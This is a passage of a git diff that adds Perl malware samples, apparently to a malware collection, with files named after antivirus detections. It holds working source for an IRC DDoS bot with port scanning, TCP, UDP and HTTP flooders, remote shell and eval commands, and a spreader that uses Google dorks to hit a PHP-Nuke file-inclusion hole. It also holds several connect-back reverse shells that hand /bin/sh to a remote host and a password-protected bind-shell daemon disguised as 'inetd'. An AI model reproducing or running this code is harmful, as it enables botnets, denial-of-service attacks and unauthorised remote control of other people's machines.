+       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+       foreach my $canal (@canais) {
+         sendraw("JOIN $canal ddosit");
+       }
+   }
+}
+
+
+sub bfunc {
+  my $printl = $_[0];
+  my $funcarg = $_[1];
+  if (my $pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           if ($funcarg =~ /^portscan (.*)/) {
+             my $hostip="$1";
+             my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
+             my (@aberta, %porta_banner);
+	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");     
+             foreach my $porta (@portas)  {
+                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
+                if ($scansock) {
+                   push (@aberta, $porta);
+                   $scansock->close;
+                }
+             }
+
+             if (@aberta) {
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
+             } else {
+               sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found"); 
+             }
+           }
+           if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
+	     my $itime = time;
+	     my ($cur_time);
+             $cur_time = time - $itime;
+	     while ($3>$cur_time){
+             $cur_time = time - $itime;
+	     &tcpflooder("$1","$2","$3");
+             }
+	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
+           }
+	   if ($funcarg =~ /^version/) {
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 HackerMalaysia Versi ".$versi_saya);		   
+		}
+           if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
+	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for Php-Nuk3 exploit ".$1." seconds.");
+	     srand;
+	     my $itime = time;
+	     my ($cur_time);
+	     my ($exploited);
+	     $boturl=$2;
+             $cur_time = time - $itime;$exploited = 0;
+		while($1>$cur_time){
+		    $cur_time = time - $itime;
+		    @urls=fetch();
+			foreach $url (@urls) {
+			$cur_time = time - $itime;
+			my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
+			$url =$path."/modules/Forums/admin/admin_users.php?phpbb_root_path=$boturl?";
+			$page = http_query($url);
+			$exploited = $exploited + 1;
+		    }
+		}
+	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." Php-Nuk3 boxes in ".$1." seconds.");
+           }
+           if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
+	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
+	     my $itime = time;
+	     my ($cur_time);
+             $cur_time = time - $itime;
+	     while ($2>$cur_time){
+             $cur_time = time - $itime;
+	     my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
+             print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
+	     close($socket);
+             }
+	     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
+           }
+           if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
+             my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
+             $dtime = 1 if $dtime == 0;
+             my %bytes;
+             $bytes{igmp} = $2 * $pacotes{igmp};
+             $bytes{icmp} = $2 * $pacotes{icmp};
+             $bytes{o} = $2 * $pacotes{o};
+             $bytes{udp} = $2 * $pacotes{udp};
+             $bytes{tcp} = $2 * $pacotes{tcp};
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
+           }
+           exit;
+       }
+  }
+}
+ 
+sub ircase {
+  my ($kem, $printl, $case) = @_;
+
+  if ($case =~ /^join (.*)/) {
+     j("$1");
+   } 
+   if ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+   if ($case =~ /^rejoin\s+(.*)/) {
+      my $chan = $1;
+      if ($chan =~ /^(\d+) (.*)/) {
+        for (my $ca = 1; $ca <= $1; $ca++ ) {
+          p("$2");
+          j("$2");
+        }
+      } else {
+          p("$chan");
+          j("$chan");
+      }
+   }
+   if ($case =~ /^op/) {
+      op("$printl", "$kem") if $case eq "op";
+      my $oarg = substr($case, 3);
+      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^deop/) {
+      deop("$printl", "$kem") if $case eq "deop";
+      my $oarg = substr($case, 5);
+      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^msg\s+(\S+) (.*)/) {
+      msg("$1", "$2");
+   }
+   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        msg("$2", "$3");
+      }
+   }
+   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
+      ctcp("$1", "$2");
+   }
+   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        ctcp("$2", "$3");
+      }
+   }
+   if ($case =~ /^nick (.*)/) {
+      nick("$1");
+   }
+   if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
+       conectar("$2", "$1", 6667);
+   }
+   if ($case =~ /^raw (.*)/) {
+      sendraw("$1");
+   }
+   if ($case =~ /^eval (.*)/) {
+     eval "$1";
+   }
+}
+
+sub shell {
+  my $printl=$_[0];
+  my $comando=$_[1];
+  if ($comando =~ /cd (.*)/) {
+    chdir("$1") || msg("$printl", "No such file or directory");
+    return;
+  } 
+  elsif ($pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           my @resp=`$comando 2>&1 3>&1`;
+           my $c=0;
+           foreach my $linha (@resp) {
+             $c++;
+             chop $linha;
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+             if ($c == "$linas_max") {
+               $c=0;
+               sleep $sleep;
+             }
+           }
+           exit;
+       }
+  }
+}
+
+sub tcpflooder {
+ my $itime = time;
+ my ($cur_time);
+ my ($ia,$pa,$proto,$j,$l,$t);
+ $ia=inet_aton($_[0]);
+ $pa=sockaddr_in($_[1],$ia);
+ $ftime=$_[2];
+ $proto=getprotobyname('tcp');
+ $j=0;$l=0;
+ $cur_time = time - $itime;
+ while ($l<1000){
+  $cur_time = time - $itime;
+  last if $cur_time >= $ftime;
+  $t="SOCK$l";
+  socket($t,PF_INET,SOCK_STREAM,$proto);
+  connect($t,$pa)||$j--;
+  $j++;$l++;
+ }
+ $l=0;
+ while ($l<1000){
+  $cur_time = time - $itime;
+  last if $cur_time >= $ftime;
+  $t="SOCK$l";
+  shutdown($t,2);
+  $l++;
+ }
+}
+
+sub udpflooder {
+  my $iaddr = inet_aton($_[0]);
+  my $msg = 'A' x $_[1];
+  my $ftime = $_[2];
+  my $cp = 0;
+  my (%pacotes);
+  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+  
+  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+
+  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+  return(undef) if $cp == 4;
+  my $itime = time;
+  my ($cur_time);
+  while ( 1 ) {
+     for (my $porta = 1; $porta <= 65000; $porta++) {
+       $cur_time = time - $itime;
+       last if $cur_time >= $ftime;
+       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
+       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
+       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+
+       for (my $pc = 3; $pc <= 255;$pc++) {
+         next if $pc == 6;
+         $cur_time = time - $itime;
+         last if $cur_time >= $ftime;
+         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
+       }
+     }
+     last if $cur_time >= $ftime;
+  }
+  return($cur_time, %pacotes);
+}
+
+sub ctcp {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+sub msg {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :$_[1]");
+}  
+sub notice {
+   return unless $#_ == 1;
+   sendraw("NOTICE $_[0] :$_[1]");
+}
+sub op {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +o $_[1]");
+}
+sub deop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -o $_[1]");
+}
+sub j { &join(@_); }
+sub join {
+   return unless $#_ == 0;
+   sendraw("JOIN $_[0]");
+}
+sub p { part(@_); }
+sub part {
+  sendraw("PART $_[0]");
+}
+sub nick {
+  return unless $#_ == 0;
+  sendraw("NICK $_[0]");
+}
+sub quit {
+  sendraw("QUIT :$_[0]");
+}
+
+# Spreader
+# this 'spreader' code isnot mine, i dont know who coded it.
+# update: well, i just fix0red this shit a bit.
+#
+
+sub fetch(){
+    my $rnd=(int(rand(9999)));
+    my $n= 80;
+    if ($rnd<5000) { $n<<=1;}
+    my $s= (int(rand(10)) * $n);
+
+my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
+		"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
+		"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
+		"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
+		"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
+		"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
+		"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
+		"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",		
+		"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
+		"vu","vn","ye","yu","cd","zm","zw","");
+my @str;
+
+foreach $dom  (@dominios)
+{
+	push (@str,"%22modules.php?name%3A%22+%7C+%22+inurl%3Amodules.php%3Fname%3D+site%3A".$dom."%20");
+}
+
+    my $query="www.google.com/search?q=";
+    $query.=$str[(rand(scalar(@str)))];
+    $query.="&num=$n&start=$s";
+    my @lst=();
+    my $page = http_query($query);
+    while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
+	if ($1 !~ m/google|cache|translate/){
+	    push (@lst,$1);
+	}
+    }
+    return (@lst);
+}
+
+sub http_query($){
+    my ($url) = @_;
+    my $host=$url;
+    my $query=$url;
+    my $page="";
+    $host =~ s/href=\"?http:\/\///;
+    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+    $query =~s/$host//;
+    if ($query eq "") {$query="/";};
+    eval {
+	local $SIG{ALRM} = sub { die "1";};
+	alarm 10;
+	my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+	print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+	my @r = <$sock>;
+	$page="@r";
+	alarm 0;
+	close($sock);
+    };    
+    return $page;
+
+}
+
+
+
+
diff --git a/Perl/Backdoor.Perl.Small.a b/Perl/Backdoor.Perl.Small.a
new file mode 100644
index 00000000..abfa77ac
--- /dev/null
+++ b/Perl/Backdoor.Perl.Small.a
@@ -0,0 +1,46 @@
+
+# Backdoor - Perl Connect Back Backdoor
+# Unpublished/Unreleased Source Code
+
+use Socket;
+
+print "Backdoor ! bypassing Firewalls\n\n";
+
+if (!$ARGV[0]) {
+  printf "Uso: $0 [Host] <Puerto>\n";
+  exit(1);
+}
+
+print "[*] Espere ...\n";
+
+$host = $ARGV[0];
+$port = 80;
+
+if ($ARGV[1]) {
+  $port = $ARGV[1];
+}
+
+print "[*] Conectando...\n";
+
+$proto = getprotobyname('tcp') || die("[-] Protocolo Desconocido\n");
+
+socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[-] Error Socket\n");
+
+my $target = inet_aton($host);
+
+if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
+  die("[-] Imposible Conectar\n");
+}
+
+print "[*] Cargando Shell...\n";
+
+if (!fork( )) {
+  open(STDIN,">&SERVER");
+  open(STDOUT,">&SERVER");
+  open(STDERR,">&SERVER");
+
+  exec {'/bin/sh'} '-bash' . "\0" x 4;
+  exit(0);
+}
+
+print "[*] Cargada a joder!\n\n";
\ No newline at end of file
diff --git a/Perl/Backdoor.Perl.Small.e b/Perl/Backdoor.Perl.Small.e
new file mode 100644
index 00000000..cd3963cf
--- /dev/null
+++ b/Perl/Backdoor.Perl.Small.e
@@ -0,0 +1,59 @@
+use IO::Socket;
+#IRAN HACKERS SABOTAGE Connect Back Shell          
+#code by:LorD
+#We Are :LorD-C0d3r-NT                                           
+#
+#lord@SlackwareLinux:/home/programing$ perl dc.pl
+#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
+#
+#Usage: dc.pl [Host] [Port]
+#
+#Ex: dc.pl 127.0.0.1 2121
+#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
+#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
+#
+#[*] Resolving HostName
+#[*] Connecting... 127.0.0.1
+#[*] Spawning Shell
+#[*] Connected to remote host
+
+#bash-2.05b# nc -vv -l -p 2121
+#listening on [any] 2121 ...
+#connect to [127.0.0.1] from localhost [127.0.0.1] 2121
+#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
+#
+#--==Systeminfo==--
+#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
+#
+#--==Userinfo==--
+#uid=1001(lord) gid=100(users) groups=100(users)
+#
+#--==Directory==--
+#/root
+#
+#--==Shell==--
+#
+$system	= '/bin/sh';
+$ARGC=@ARGV; 
+print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n"; 
+if ($ARGC!=2) { 
+   print "Usage: $0 [Host] [Port] \n\n"; 
+   die "Ex: $0 127.0.0.1 2121 \n"; 
+} 
+use Socket; 
+use FileHandle; 
+socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 
+connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 
+print "[*] Resolving HostName\n";
+print "[*] Connecting... $ARGV[0] \n"; 
+print "[*] Spawning Shell \n";
+print "[*] Connected to remote host \n";
+SOCKET->autoflush(); 
+open(STDIN, ">&SOCKET"); 
+open(STDOUT,">&SOCKET"); 
+open(STDERR,">&SOCKET"); 
+print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--  \n\n"; 
+system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
+echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); 
+system($system);
+#EOF
\ No newline at end of file
diff --git a/Perl/Backdoor.Perl.Small.i b/Perl/Backdoor.Perl.Small.i
new file mode 100644
index 00000000..ee19680a
--- /dev/null
+++ b/Perl/Backdoor.Perl.Small.i
@@ -0,0 +1,18 @@
+use Socket;
+$cmd= "lynx";
+$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
+$0=$cmd;
+$target=$ARGV[0];
+$port=$ARGV[1];
+$iaddr=inet_aton($target) || die("Error: $!\n");
+$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
+$proto=getprotobyname('tcp');
+socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
+connect(SOCKET, $paddr) || die("Error: $!\n");
+open(STDIN, ">&SOCKET");
+open(STDOUT, ">&SOCKET");
+open(STDERR, ">&SOCKET");
+system($system);
+close(STDIN);
+close(STDOUT);
+close(STDERR);
\ No newline at end of file
diff --git a/Perl/Backdoor.Perl.Termapp.a b/Perl/Backdoor.Perl.Termapp.a
new file mode 100644
index 00000000..92d9fbf4
--- /dev/null
+++ b/Perl/Backdoor.Perl.Termapp.a
@@ -0,0 +1,462 @@
+# Telnet-like Standard Daemon 0.7
+#
+#    0ldW0lf - oldwolf@atrixteam.net
+#            - old-wolf@zipmai.com
+#            - www.atrix.cjb.net
+#            - www.atrixteam.net
+#
+#  For those guys that still like to open ports
+#  and use non-rooted boxes
+#
+#  This has been developed to join in the TocToc
+#  project code, now it's done and I'm distributing
+#  this separated
+#
+#  This one i made without IO::Pty so it uses
+#  only standard modules... enjoy it
+#
+#  tested on linux boxes.. probably will work fine on others
+#  any problem... #atrix@irc.brasnet.org
+#
+
+##########################################################
+# ******************* CONFIGURATION ******************** #
+##########################################################
+my $PORT        = $ARGV[0] || 3847;        # default port is 3847
+my $PASS        = 'ouhEUhhJ6RbwE';         # encripted password
+my $SHELL       = "/bin/bash";             # shell to be executed
+my $HOME        = "/tmp";                  # your HOME
+my $PROC        = "inetd";                 # name of the process
+my $PASS_PROMPT = "Password: ";            # password prompt
+my $WRONG_PASS  = "Password Errata!";       # "wrong password" message
+my @STTY        = ('sane', 'dec');         # stty arguments
+##########################################################
+
+# feel free to change the ENV
+#### ENVironment ####
+$ENV{HOME}       = $HOME;
+#$ENV{PS1}        = '[\u@\h \W]: '; # the way i like :)
+                 # colorful PS1 is also funny :)
+$ENV{PS1}        = '\[\033[3;36m\][\[\033[3;34m\]\[\033[1m\]\u\[\033[3;36m\]@\[\033[0m\]\[\033[3;34m\]\[\033[1m\]\h \[\033[0m\]\[\033[1m\]\W\[\033[0m\]\[\033[3;36m\]]\[\033[0m\]\[\033[1m:\[\033[0m\] ';
+$ENV{MAIL}       = '/var/mail/root';
+$ENV{PATH}       = '/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin';
+$ENV{HISTFILE}   = '/dev/null';
+$ENV{USER}       = 'root';
+$ENV{LOGNAME}    = 'root';
+$ENV{LS_OPTIONS} = ' --color=auto -F -b -T 0';
+$ENV{LS_COLORS}  = 'no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.bz2=01;31:*.rpm=01;31:*.deb=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.mpg=01;37:*.avi=01;37:*.mov=01;37:';
+$ENV{SHELL}      = $SHELL;
+$ENV{TERM}       = 'xterm';
+#####################
+
+$0=$PROC."\0";
+
+use IO::Socket;
+use IO::Select;
+use POSIX;
+use strict;
+
+# i wouldn't change that
+# if i were you
+###### SIGnals ######
+$SIG{HUP}  = 'IGNORE';
+$SIG{PS}   = 'IGNORE';
+$SIG{TERM} = 'IGNORE';
+$SIG{CHLD} = sub { wait; };
+#####################
+
+
+# ioctl stuff
+my %IOCTLDEF;
+$IOCTLDEF{TIOCSWINSZ} = 0x5414;
+$IOCTLDEF{TIOCNOTTY}  = 0x5422;
+$IOCTLDEF{TIOCSCTTY}  = 0x540E;
+safeload('sys/ttycom.ph', 1); # BSD
+safeload('sys/ioctl.ph', 1);
+safeload('asm/ioctls.ph', 1);
+
+foreach my $IOCTL (keys(%IOCTLDEF)) {
+  next if (defined(&{$IOCTL}));
+
+  if (open(IOD, "< /usr/include/asm/ioctls.h")) { # linux
+    while(<IOD>) {
+      if (/^\#define\s+$IOCTL\s+(.*?)\n$/) {
+        eval "sub $IOCTL () {$1;}";
+        last;
+      }
+    }
+    close(IOD);
+  }
+
+  # i realy dunno if i can do that.. but.. here it goes
+  eval "sub $IOCTL () { $IOCTLDEF{$IOCTL};}" unless (defined(&{$IOCTL}));
+}
+
+
+# starting...
+$PORT = $ARGV[0] if ($ARGV[0]);
+chdir('/');
+
+no strict 'refs';
+my $bindfd = *{'bind_sock'};
+*{$bindfd}= IO::Socket::INET->new(Listen => 1, LocalPort => $PORT, Proto => "tcp") || die "could not listen on port $PORT: $!";
+my $bind = \*{$bindfd};
+
+my $pid = fork();
+die "ERROR: I could not fork() the process." unless defined($pid);
+exit if $pid;
+
+
+my %CLIENT;
+my $sel_serv = IO::Select->new($bind);
+my $sel_shell = IO::Select->new();
+
+
+# main loop...
+while ( 1 ) {
+  select(undef,undef,undef, 0.3) if (scalar(keys(%CLIENT)) == 0);
+
+  read_clients();
+  read_shells();
+}
+
+sub read_clients {
+  map { read_client($_) } ($sel_serv->can_read(0.01));
+}
+
+sub read_client {
+  my $fh = shift;
+
+  if ($fh eq $bind) {
+    my $newcon = $bind->accept;
+    $sel_serv->add($newcon);
+    $CLIENT{$newcon}->{senha} = 0;
+    $CLIENT{$newcon}->{sock} = $newcon;
+    $fh->autoflush(1);
+    do_client($newcon, '3', '5', '1');
+    sleep(1);
+    write_client($newcon, $PASS_PROMPT) if ($PASS_PROMPT);
+  } else {
+      my $msg;
+      my $nread = sysread($fh, $msg, 1024);
+
+      if ($nread == 0) {
+        close_client($fh);
+      } else {
+         telnet_parse($fh, $msg);
+      }
+  }
+}
+
+sub read_shells {
+  map { read_shell($_) } ($sel_shell->can_read(0.01));
+}
+
+sub telnet_parse {
+  my ($cli, $msg) = @_;
+  my $char = (split('', $msg))[0];
+
+  if (ord($char) == 255) {
+     chr_parse($cli, $msg);
+  } else {
+     if ($CLIENT{$cli}->{senha} == 0) {
+       $CLIENT{$cli}->{buf} .= $msg;
+
+       return() unless ($msg =~ /\r|\n/);
+
+       my $pass = $CLIENT{$cli}->{buf};
+       $CLIENT{$cli}->{buf} = '';
+
+       $pass =~ s/\n//g;
+       $pass =~ s/\0//g;
+       $pass =~ s/\r//g;
+
+       if (crypt($pass, $PASS) ne $PASS) {
+         finish_client($cli, "\r\n\r".$WRONG_PASS."\r\n\r");
+       } else {
+          $CLIENT{$cli}->{senha} = 1;
+          write_client($cli, chr(255).chr(253).chr(31));
+          write_client($cli, "\r\n\r\r\n\r");
+          new_shell($cli);
+       }
+       return();
+     }
+
+     $msg =~ s/\r\n\0\0//g;
+     $msg =~ s/\0//g;
+     $msg =~ s/\r\n/\n/g;
+     write_shell($cli, $msg);
+  }
+}
+
+sub read_shell {
+  my $shell = shift;
+  my $cli;
+  map { $cli = $CLIENT{$_}->{sock} if ($CLIENT{$_}->{shell} eq $shell) } keys(%CLIENT);
+
+  my $msg;
+  my $nread = sysread($shell, $msg, 1024);
+ 
+  if ($nread == 0) {
+    finish_client($cli, "Terminal closed.\r\n\r");
+  } else {
+     write_client($cli, $msg);
+  }
+}
+
+sub to_chr {
+  my $chrs = '';
+  map { $chrs .= chr($_) }  (split(/ +/, shift));
+  return($chrs);
+}
+
+sub do_client {
+  my ($client, @codes) = @_;
+  map { write_client($client, chr(255).chr(251).chr($_)) } @codes;
+}
+
+
+sub chr_parse { 
+  my ($client, $chrs) = @_;
+
+  my $ords = '';
+  map { $ords .= ord($_).' ' } (split(//, $chrs));
+  my $msg = '';
+
+
+  if ($ords =~ /255 250 31 (\d+) (\d+) (\d+) (\d+)/) {
+     my $winsize = pack('C4', $4, $3, $2, $1);
+     ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);# || die "erro: $!";
+  }
+
+  foreach my $code (split("255 ", $ords)) {
+    if ($code =~ /(\d+) (.*)$/) {
+      my $codes = $2;
+      if ($1 == 251) {
+        # do whatever you want dude ehehe
+        $msg .= chr(255).chr(253);
+
+        map { $msg .= chr($_) } (split(/ +/, $codes));
+      }
+    }
+  }
+
+  write_client($client, $msg) if ($msg);
+  return(1);
+}
+
+sub new_shell {
+  my $cli = shift;
+
+  POSIX::setpgid(0, 0);
+
+  my ($tty, $pty);
+
+  unless (($tty, $pty) = open_tty($cli)) {
+    finish_client($cli, "ERROR: No more pty┤s avaliable\n");
+    return(undef);
+  }
+
+  my $pid = fork();
+  if (not defined($pid)) {
+    finish_client($cli, "ERROR: fork()\n");
+    return(undef);
+  }
+
+  unless($pid) {
+    close($pty);
+
+    local(*DEVTTY);
+
+    if (open (DEVTTY, "/dev/tty")) {
+      ioctl(DEVTTY, &TIOCNOTTY, 0 );# || die "erro: $!";
+      close(DEVTTY);
+    }
+
+    POSIX::setsid();
+    ioctl($tty, &TIOCSCTTY, 0);# || die "erro: $!";
+
+    open (STDIN, "<&".fileno($tty)) || die "I could not reopen STDIN: $!";
+    open (STDOUT, ">&".fileno($tty)) || die "I could not reopen STDOUT: $!";
+    open (STDERR, ">&".fileno($tty)) || die "I could not reopen STDERR: $!";
+    close($tty);
+
+    sleep(1);
+
+    foreach my $stty ("/bin/stty", "/usr/bin/stty") {
+      next unless (-x $stty);
+      map { system("$stty", $_) } @STTY;
+    }
+
+    chdir("$HOME");
+    { exec("$SHELL") };
+
+    syswrite(STDOUT, "\n\nERROR: exec($SHELL)\n\nI could not execute the shell ($SHELL)\nHowever you are lucky :P\nYou can use the \"I'm FUCKED!\" mode and fix up this thing...\nTip: Find some shell and execute it ;)\n\n");
+    syswrite(STDOUT, "\n\nOK! I'm Fucked mode.\n");
+    syswrite(STDOUT, "Type ^C to exit\n\nI'm FuCKeD!# ");
+
+    while (my $msg = <STDIN>) {
+      $msg =~ s/\n$//;
+      $msg =~ s/\r$//;
+
+      if ($msg =~ /^\s*cd\s+(\S+)/) {
+        my $notf = "directory $1 not found!\n";
+        chdir($1) || syswrite(STDOUT, $notf, length($notf));
+      } else {
+         system("$msg 2>&1");
+      }
+      syswrite(STDOUT, "I'm FuCKeD!# ");
+    }
+
+    exit;
+  }
+  close($tty);
+
+  select($pty); $| = 1;
+  select(STDOUT);
+
+  set_raw($pty);
+
+  $CLIENT{$cli}->{shell} = $pty;
+  $sel_shell->add($pty);
+
+  return(1);
+}
+
+
+
+# Funciton set_raw() stolen from IO::Pty
+sub set_raw($) {
+  my $self = shift;
+  return 1 if not POSIX::isatty($self);
+  my $ttyno = fileno($self);
+  my $termios = new POSIX::Termios;
+  unless ($termios) {
+#    warn "set_raw: new POSIX::Termios failed: $!";
+    return undef;
+  }
+  unless ($termios->getattr($ttyno)) {
+#    warn "set_raw: getattr($ttyno) failed: $!";
+    return undef;
+  }
+  $termios->setiflag(0);
+  $termios->setoflag(0);
+  $termios->setlflag(0);
+  $termios->setcc(&POSIX::VMIN, 1);
+  $termios->setcc(&POSIX::VTIME, 0);
+  unless ($termios->setattr($ttyno, &POSIX::TCSANOW)) {
+#    warn "set_raw: setattr($ttyno) failed: $!";
+    return undef;
+  }
+  return 1;
+}
+
+sub open_tty {
+  no strict;
+  my $cli = shift;
+  my ($PTY, $TTY) = (*{"pty.$cli"}, *{"tty.$cli"}); # believe me old versions :/
+
+  
+  for (my $i = 0; $i < 256; $i++) {
+     my $pty = get_tty($i, "/dev/pty");
+     next unless (open($PTY, "+> $pty"));
+
+     my $tty = get_tty($i, "/dev/tty");
+
+     unless(open($TTY, "+> $tty")) {
+       close($PTY);
+       next;
+     }
+
+     return($TTY, $PTY);
+
+  }
+
+  return();
+}
+
+sub get_tty {
+  my ($num, $base) = @_;
+
+  my @series = ('p' .. 'z', 'a' .. 'e');
+  my @subs = ('0' .. '9', 'a' .. 'f');
+
+  my $buf = $base;
+  $buf .= @series[($num >> 4) & 0xF];
+  $buf .= @subs[$num & 0xF];
+
+  return($buf);
+}
+
+sub safeload {
+  my ($module, $require, $arg) = @_;
+  my $file = $module;
+  $file =~ s/::/\//g;
+
+  if ($require) {
+    # all found gonna be loaded
+    map { eval ("require \"$_/$file\";") if(-f "$_/$file"); } @INC;
+  } else {
